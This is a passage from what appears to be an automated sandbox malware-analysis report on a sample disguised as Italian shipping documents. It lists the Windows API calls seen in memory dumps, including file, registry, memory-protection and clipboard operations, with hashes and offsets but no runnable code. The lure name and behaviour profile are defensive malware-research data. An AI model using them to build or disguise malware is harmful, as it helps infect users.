                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                  • Instruction ID: 6883b19bcb958afdb132cd43d0a9aeb12fc85c99e1cf53eaa24744f9dd55f8c1
                                                  • Opcode Fuzzy Hash: ecfc0d1632056c4e1693efd0f98aabdfe4a2c93a6abc515f3d9591ad468ff55d
                                                  • Instruction Fuzzy Hash: CDE08636714611ABD210BA745E48C6777A89F86610306C83EF542F2141D734DC33AA79
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(00000003,00403138,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,80000000,00000003), ref: 00406196
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004061B8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                  • Instruction ID: be52236ca1bfc2e7009fe271a1dfd41440a2a0d1ebc26b2cb4c8630358080456
                                                  • Opcode Fuzzy Hash: d28f21770be58fa8ab322e44db2ef64be76ab1399ecbb41bfd548adfe90c5e60
                                                  • Instruction Fuzzy Hash: 30D09E31254301EFFF098F20DE16F2EBAA2EB94B00F11952CB682941E0DA715819DB15
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403658,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040394F,?,00000008,0000000A,0000000C), ref: 00405C56
                                                  • GetLastError.KERNEL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00405C64
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                  • Instruction ID: 868687b2a80a8d4cb6d5034857ca3092976d2c25b2f3b55ea206b3a8d14aaeda
                                                  • Opcode Fuzzy Hash: 713f00ffaa2578e3ba1d99e04a2fab42aad7341dbc9e3b83e2e07bf738d273a4
                                                  • Instruction Fuzzy Hash: C7C04C30608701DAEA105B31DE8CB177A50BB54741F198439A582F41B0DA348555D92D
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(00000000), ref: 73D82C57
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2754469165.0000000073D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 73D80000, based on PE: true
                                                  • Associated: 00000000.00000002.2753818118.0000000073D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2755665306.0000000073D84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2756655131.0000000073D86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73d80000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  • Opcode ID: c4e031796691b6e7a28bd89f38c26ac7f2d6bdb5448c88afa68ffbb2a7d54939
                                                  • Instruction ID: c8df26e39b6eeb8f35015a4710ccf2a7f1ade59d75aea4e15a7cd39b3aba9ec4
                                                  • Opcode Fuzzy Hash: c4e031796691b6e7a28bd89f38c26ac7f2d6bdb5448c88afa68ffbb2a7d54939
                                                  • Instruction Fuzzy Hash: 334170B3500308DFEB12AF69D985BDD3B7AFB44724F308426E40AB6140E739B4909BE5
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028D4
                                                    • Part of subcall function 004065E9: wsprintfW.USER32 ref: 004065F6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: FilePointerwsprintf
                                                  • String ID:
                                                  • API String ID: 327478801-0
                                                  • Opcode ID: 71ec0585dfc1f5a4deb38e390d125e8dba0ecba5ee550c3c95508aededf6839d
                                                  • Instruction ID: 25ca00dcee0cf0708ebb41b42c3bcfe7940f6ca7f4ca5ddd9dc2277bf7af936e
                                                  • Opcode Fuzzy Hash: 71ec0585dfc1f5a4deb38e390d125e8dba0ecba5ee550c3c95508aededf6839d
                                                  • Instruction Fuzzy Hash: 04E06D71A08104AAEB04ABA5AE49CAF7379AF90345B20443FF101B00D8C6794D119A2D
                                                  APIs
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040240E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                  • Instruction ID: ca2f62041d63e4abf833ada0eb3473e8090594299762c22e2e4a91b8788c92d6
                                                  • Opcode Fuzzy Hash: cc309e7f02997b5e016163de44fe3fdddd8bf4d3fe64c06df27e2bc62d43203d
                                                  • Instruction Fuzzy Hash: CEE086319105266BDB103AF20ECE9BE2058AF48308B24093FF512B61C2DEFC8C42567D
                                                  APIs
                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E7C,00000000,?,?), ref: 00406566
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                  • Instruction ID: cfc89692b4771faa31f3440cbcbb3328f2b21d62788620711c29387ee39994bc
                                                  • Opcode Fuzzy Hash: b17b4e85cc10dff7c00d1995fa2300a068af545831f113dbcef6cd8b4d780b07
                                                  • Instruction Fuzzy Hash: 94E0BFB2010109BEEF095F50EC0AD7F371DE708210F11452EF946D5051E6B5A9309674
                                                  APIs
                                                  • WriteFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,0040E9E4,0040CEF0,0040359E,0040CEF0,0040E9E4,00414EF0,00004000,?,00000000,004033C8,00000004), ref: 00406258
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                  • Instruction ID: 50ccb5e768420c5b79bdfebb9096a84dabe54a6ff5c0a4120d9a71b85527c923
                                                  • Opcode Fuzzy Hash: 4494c28c6fc58b77f7b94402ffbb10e79d92760fb9961e7d9dbcb201027e3d13
                                                  • Instruction Fuzzy Hash: FDE08C3221821AABCF10BE608C00EEB3B6CEB017A0F02447AFD56E3050D231E83097A8
                                                  APIs
                                                  • ReadFile.KERNELBASE(00008001,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040361A,00008001,00008001,0040351E,00414EF0,00004000,?,00000000,004033C8), ref: 00406229
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                  • Instruction ID: fbac330590941eb325162a4ee9bfa4b3c7313c609e27a1dd4f64d068a4d06545
                                                  • Opcode Fuzzy Hash: 076a4193e787d8b2f8fcded04b516b0b1a94860d7d4352c54bed072072f3bbd3
                                                  • Instruction Fuzzy Hash: 8FE08632110129ABCF106E549C00EEB375CEF05350F014876F951E3040D730E83187A5
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(73D8505C,00000004,00000040,73D8504C), ref: 73D82A9D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2754469165.0000000073D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 73D80000, based on PE: true
                                                  • Associated: 00000000.00000002.2753818118.0000000073D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2755665306.0000000073D84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2756655131.0000000073D86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73d80000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 7da0ec49d36577c636bffe6251700c28d46719860ba40a51385ea03de85c8b3a
                                                  • Instruction ID: 6db2b59c91eff4f8da692282b0a88ab936058d2a4c5c003d13314ff8bbf8f262
                                                  • Opcode Fuzzy Hash: 7da0ec49d36577c636bffe6251700c28d46719860ba40a51385ea03de85c8b3a
                                                  • Instruction Fuzzy Hash: 88F0A5F3520380DEC350EF3A8445B893FE2B708714B34452AE19EEA281E3347068DF9A
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(00000000,00421F28,00000000,00000000,?,?,00000000,?,0040659D,?,00421F28,?,?,Call,?,00000000), ref: 00406533
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                  • Instruction ID: f918e5a98cb24a054262289ed7dc727aaea68e18f53d3a7cb50250e03803467c
                                                  • Opcode Fuzzy Hash: 8ee5b0d2344bda13eae74e7442d869633e0228d129a7f9cdea9876c3f2a2c01f
                                                  • Instruction Fuzzy Hash: 49D0127200020DBBDF119E90AD01FAB3B1DEB08750F014826FE06A4090D775D530A759
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040331B,?), ref: 0040362B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                  • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                                                  • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                                                  • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                                                  APIs
                                                  • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID:
                                                  • API String ID: 3472027048-0
                                                  • Opcode ID: 5336109075fc53c24936953caa465b8c284d602aedfe9fd7dab949f6f964baca
                                                  • Instruction ID: 1b717f002b1b5d42ac4a363b0c989c392d1cd2f92e3df3bac2afb992ac9c93ae
                                                  • Opcode Fuzzy Hash: 5336109075fc53c24936953caa465b8c284d602aedfe9fd7dab949f6f964baca
                                                  • Instruction Fuzzy Hash: 2BD05E73A146008BD754EBB8BE8549F73A8EA50319320483BD102E1091E6788902861C
                                                  APIs
                                                  • GlobalAlloc.KERNELBASE(00000040,?,73D812DB,?,73D8137F,00000019,73D811CA,-000000A0), ref: 73D812C5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2754469165.0000000073D81000.00000020.00000001.01000000.00000004.sdmp, Offset: 73D80000, based on PE: true
                                                  • Associated: 00000000.00000002.2753818118.0000000073D80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2755665306.0000000073D84000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2756655131.0000000073D86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73d80000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: AllocGlobal
                                                  • String ID:
                                                  • API String ID: 3761449716-0
                                                  • Opcode ID: 14cc64451a564230862874c411773861606ca0f1aeea951efb7f492274ef8f3c
                                                  • Instruction ID: 0af51b21413dab1e2b90ec1981852b88c5c1481e2356a11f727ce918e17981df
                                                  • Opcode Fuzzy Hash: 14cc64451a564230862874c411773861606ca0f1aeea951efb7f492274ef8f3c
                                                  • Instruction Fuzzy Hash: 10B002B36501109FEE40AB55DD4FF7536A5F740705F744050B609D5141D7646824866D
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 004058C4
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004058D3
                                                  • GetClientRect.USER32(?,?), ref: 00405910
                                                  • GetSystemMetrics.USER32(00000002), ref: 00405917
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405938
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405949
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040595C
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040596A
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040597D
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040599F
                                                  • ShowWindow.USER32(?,00000008), ref: 004059B3
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004059D4
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004059E4
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059FD
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405A09
                                                  • GetDlgItem.USER32(?,000003F8), ref: 004058E2
                                                    • Part of subcall function 00404656: SendMessageW.USER32(00000028,?,00000001,00404481), ref: 00404664
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405A26
                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000057FA,00000000), ref: 00405A34
                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A3B
                                                  • ShowWindow.USER32(00000000), ref: 00405A5F
                                                  • ShowWindow.USER32(00000000,00000008), ref: 00405A64
                                                  • ShowWindow.USER32(00000008), ref: 00405AAE
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405AE2
                                                  • CreatePopupMenu.USER32 ref: 00405AF3
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405B07
                                                  • GetWindowRect.USER32(?,?), ref: 00405B27
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405B40
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B78
                                                  • OpenClipboard.USER32(00000000), ref: 00405B88
                                                  • EmptyClipboard.USER32 ref: 00405B8E
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B9A
                                                  • GlobalLock.KERNEL32(00000000), ref: 00405BA4
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405BB8
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405BD8
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00405BE3
                                                  • CloseClipboard.USER32 ref: 00405BE9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2719129798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2719084173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719144113.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2719209514.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2720023612.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                  • String ID: H/B${
                                                  • API String ID: 590372296-332483393
                                                  • Opcode ID: b4ac37d96ff1ca46bd369c895d54e34b2496975cf73faa18766466022b69d915
